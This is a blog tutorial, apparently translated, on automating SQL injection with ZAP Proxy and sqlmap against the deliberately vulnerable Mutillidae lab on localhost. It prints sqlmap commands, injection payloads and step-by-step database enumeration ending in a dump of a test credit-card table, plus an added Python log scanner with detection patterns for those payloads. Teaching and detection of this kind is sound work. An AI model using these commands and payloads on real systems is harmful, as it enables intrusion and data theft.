
A1: 2017 - Injections (Part 3 and Last)

In my favorite computer game, Quest for Glory 2: Trial by Fire, when the world is once again in danger the protagonist enters the University of Wizards. After he passes the entrance examinations, the bearded wise wizards invite him to enrol, because once he finishes he will understand all the intricacies of magic, know every spell, and then surely save his friends and defeat the world's evil. The only problem is that the course takes 15-20 years, and in that time the forces of evil will have managed to win more than once.

I involuntarily recall this episode every time another interesting book or a pile of technical documentation lands in front of me. A lot of books have been written about time management, but for me it comes down to a simple formula: understand the basics, work through the examples, and then automate!

Now that we roughly understand how injections work, why not make life easier and go through one last example with the help of additional software. We need two tools:
sqlmap, a tool that automates the search for and exploitation of SQL injection vulnerabilities, and ZAP Proxy, a local proxy server that lets us inspect the traffic between the browser and the web server.

Once again it should be said that these are not the only tools of this kind; someone in a neighbouring blog will surely insist that you should use sqlninja instead of sqlmap and not waste time on ZAP when there is Burp. I will not argue with anyone.

To make life easier, we start by intercepting the traffic between the client and the web server. The captured request is then handed to sqlmap as its input. Strictly speaking, the URL of the vulnerable application alone would also do, but for now the data from the proxy makes things clearer.

We will work with the same example from A1 that we discussed in the previous article (“SQLi - Extract Data” > “User Info (SQL)”).


Open this page through ZAP Proxy and enter some data. I understand it is tempting to try something from what we have already learned, but right now just enter any obviously wrong data. I enter my favorite admin / password and see this request in the interception:

 GET http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=password&user-info-php-submit-button=View+Account+Details HTTP/1.1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Referer: http://127.0.0.1/mutillidae/index.php?page=user-info.php
 Cookie: showhints=1; PHPSESSID=aqvrdm615sm8k7isopefgbhega
 Connection: keep-alive
 Upgrade-Insecure-Requests: 1
 Host: 127.0.0.1

Here we are mainly interested in the first line, the request itself. Sometimes it is useful to check that we intercepted the right thing: repeat this request in the same browser, and if we get the same error page we are on the right track.

Let's save our intercepted request as a separate file request_sqlmap.txt.

Now we pass this file to sqlmap for analysis:

 sqlmap -r request_sqlmap.txt --banner

The --banner parameter makes sqlmap try to determine which DBMS we are dealing with. In our example this is not critical, but in practice it speeds up testing, because sqlmap will not be distracted by payloads for DBMSs that do not apply to the target.

 [23:19:48] [INFO] GET parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
 GET parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
 sqlmap identified the following injection point(s) with a total of 181 HTTP(s) requests:
 ---
 Parameter: username (GET)
     Type: error-based
     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
     Payload: page=user-info.php&username=admin' AND (SELECT 5399 FROM(SELECT COUNT(*),CONCAT(0x7171707871,(SELECT (ELT(5399=5399,1))),0x71706a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UUZA'='UUZA&password=password&user-info-php-submit-button=View Account Details

     Type: UNION query
     Title: Generic UNION query (NULL) - 7 columns
     Payload: page=user-info.php&username=admin' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171707871,0x4d754c5372467a65665a4c7672636e4c4a554777547162474e666f784e6b69754a43544a41675a50,0x71706a6271),NULL,NULL,NULL-- GGvT&password=password&user-info-php-submit-button=View Account Details
 ---
 [23:20:10] [INFO] the back-end DBMS is MySQL
 [23:20:10] [INFO] fetching banner
 web server operating system: Windows
 web application technology: Apache 2.4.29, PHP 7.2.3
 back-end DBMS: MySQL >= 5.0
 banner: '10.1.31-MariaDB'
 [23:20:10] [INFO] fetched data logged to text files under '/home/belowzero273/.sqlmap/output/127.0.0.1'

The scan completed successfully, and once again we saw what we already knew:

 [23:19:48] [INFO] GET parameter 'username' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable 

In addition, sqlmap determined that we are dealing with MySQL, or rather its fork (MariaDB). Now let's see which databases are on the server:

 sqlmap -r request_sqlmap.txt -p username --dbms=MySQL --dbs

From here on we keep passing the interception file to sqlmap, together with what we already know: the vulnerable parameter (-p username) and the DBMS type, plus the --dbs key to list the existing databases:

 [23:27:19] [WARNING] reflective value(s) found and filtering out
 available databases [6]:
 [*] information_schema
 [*] mutillidae
 [*] mysql
 [*] performance_schema
 [*] phpmyadmin
 [*] test


Fine. Databases are usually given meaningful names, or are created automatically when applications are installed. Nobody has repealed the principle of "security by obscurity", of course, but it is the exception rather than the rule. The most interesting one in our case is clearly the mutillidae database; let's see what it consists of:

 sqlmap -r request_sqlmap.txt -p username --dbms=MySQL -D mutillidae --tables

Here we add the database we need (-D) and the --tables key to what we already know, in order to list the tables in this database:

 [23:29:42] [WARNING] reflective value(s) found and filtering out
 Database: mutillidae
 [13 tables]
 +----------------------------+
 | accounts                   |
 | balloon_tips               |
 | blogs_table                |
 | captured_data              |
 | credit_cards               |
 | help_texts                 |
 | hitlog                     |
 | level_1_help_include_files |
 | page_help                  |
 | page_hints                 |
 | pen_test_tools             |
 | user_poll_results          |
 | youtubevideos              |
 +----------------------------+

Not bad already. The credit_cards table looks especially promising. Let's look inside it:

 sqlmap -r request_sqlmap.txt -p username --dbms=MySQL -D mutillidae -T credit_cards --columns

and get:

 [23:31:35] [WARNING] reflective value(s) found and filtering out
 Database: mutillidae
 Table: credit_cards
 [4 columns]
 +------------+---------+
 | Column     | Type    |
 +------------+---------+
 | ccid       | int(11) |
 | ccnumber   | text    |
 | ccv        | text    |
 | expiration | date    |
 +------------+---------+

Wow, there really is a whole table where credit card data is stored! Since we are here already, let's dump this table:

 sqlmap -r request_sqlmap.txt -p username --dbms=MySQL -D mutillidae -T credit_cards --dump

Oops:

 [23:32:42] [WARNING] reflective value(s) found and filtering out
 Database: mutillidae
 Table: credit_cards
 [5 entries]
 +------+-----+------------------+------------+
 | ccid | ccv | ccnumber         | expiration |
 +------+-----+------------------+------------+
 | 1    | 745 | 4444111122223333 | 2012-03-01 |
 | 2    | 722 | 7746536337776330 | 2015-04-01 |
 | 3    | 461 | 8242325748474749 | 2016-03-01 |
 | 4    | 230 | 7725653200487633 | 2017-06-01 |
 | 5    | 627 | 1234567812345678 | 2018-11-01 |
 +------+-----+------------------+------------+

Here they are, our credit cards. Two questions should now be sounding in your head: how does this work, and where does all this data come from?

How does it work? Strictly speaking, just as if you went through all the possible options yourself, trying one payload after another to exploit this or that vulnerability.

Where the data comes from is a question for the administrator who put such important information in such an inappropriate place.
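The 181 requests sqlmap sent leave a recognisable trail in the web server log, and the payload shapes in its output above are what a defender can key on. The following script is an added example, not part of the original article: it scans constructed Apache-style log lines for those signatures per source address and parameter, and flags a source that hits one parameter with several distinct payload families.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit, parse_qs

# Payload shapes copied from the sqlmap output above: the error-based probe
# built on FLOOR(RAND(0)*2) ... GROUP BY, the UNION ALL SELECT NULL,...
# column probe, and CONCAT() wrapped in sqlmap's hex marker strings.
SIGNATURES = {
    "error_based_floor_rand": re.compile(r"FLOOR\(RAND\(0\)\*2\)", re.I),
    "union_null_columns": re.compile(r"UNION\s+ALL\s+SELECT\s+NULL", re.I),
    "hex_marker_concat": re.compile(r"CONCAT\(0x[0-9a-f]{6,}", re.I),
}

# Apache common log format: ip ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log (not real traffic), modelled on the requests
# sqlmap sent against the user-info.php page in the article.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Nov/2018:23:19:40 +0300] "GET /mutillidae/index.php?page=user-info.php&username=admin&password=password HTTP/1.1" 200 5120
10.0.0.5 - - [12/Nov/2018:23:19:48 +0300] "GET /mutillidae/index.php?page=user-info.php&username=admin%27%20AND%20(SELECT%205399%20FROM(SELECT%20COUNT(*),CONCAT(0x7171707871,(SELECT%20(ELT(5399=5399,1))),0x71706a6271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27UUZA%27=%27UUZA&password=password HTTP/1.1" 500 1200
10.0.0.5 - - [12/Nov/2018:23:19:49 +0300] "GET /mutillidae/index.php?page=user-info.php&username=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x7171707871,0x4d754c53,0x71706a6271),NULL,NULL,NULL--%20GGvT&password=password HTTP/1.1" 200 6000
10.0.0.9 - - [12/Nov/2018:23:20:01 +0300] "GET /mutillidae/index.php?page=user-info.php&username=bob&password=secret HTTP/1.1" 200 5100
"""

def scan_line(line):
    """Return (ip, parameter, signature) hits found in one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    hits = []
    # parse_qs percent-decodes the values, so the regexes see the raw SQL
    for param, values in parse_qs(urlsplit(m.group("target")).query).items():
        for value in values:
            for name, rx in SIGNATURES.items():
                if rx.search(value):
                    hits.append((m.group("ip"), param, name))
    return hits

def scan_log(text):
    """Aggregate hits into {(ip, parameter): Counter(signature -> count)}."""
    agg = defaultdict(Counter)
    for line in text.splitlines():
        for ip, param, name in scan_line(line):
            agg[(ip, param)][name] += 1
    return agg

def flag_sources(agg, min_families=2):
    """One source hitting one parameter with several distinct payload
    families looks like automated testing rather than a stray quote."""
    return sorted(k for k, c in agg.items() if len(c) >= min_families)
```

Running flag_sources(scan_log(SAMPLE_LOG)) reports 10.0.0.5 probing the username parameter, while the normal login attempts from 10.0.0.9 produce no hits.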

Sqlmap has dozens of parameters that cannot all be covered in one article. But the aim of my articles is to introduce the approach; the rest is up to you. At your leisure, try digging through the same databases and experimenting with the parameters; perhaps credit cards are not the most interesting thing there. =)


Source: https://habr.com/ru/post/429706/
